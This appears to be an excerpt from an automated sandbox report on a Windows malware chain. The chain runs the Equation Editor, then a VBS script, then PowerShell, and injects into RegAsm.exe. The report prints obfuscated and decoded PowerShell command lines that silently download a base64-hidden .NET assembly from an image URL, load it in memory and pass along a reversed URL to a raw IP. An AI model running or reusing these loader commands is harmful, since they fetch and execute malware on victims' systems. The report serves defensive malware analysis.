                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3856Thread sleep time: -120000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776Thread sleep count: 9319 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776Thread sleep time: -27957000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407877 FindFirstFileW,FindNextFileW,9_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E8F9 FindFirstFileExA,9_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_9-49356
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00443355 mov eax, dword ptr fs:[00000030h]9_2_00443355
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004120B2 GetProcessHeap,HeapFree,9_2_004120B2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434BD8 SetUnhandledExceptionFilter,9_2_00434BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0043503C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0043BB71

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe9_2_00412132
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419662 mouse_event,9_2_00419662
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dc? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?v? ? ? ? ?gk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?mg? ? ? ? ?w? ? ? ? ?di? ? ? ? ?n? ? ? ? ?? ? ? ? ?w? ? ? ? ?dk? ? ? ? ?m? ? ? ? ?? ? ? ? ?1? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?d
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.tsonu/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dc? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? 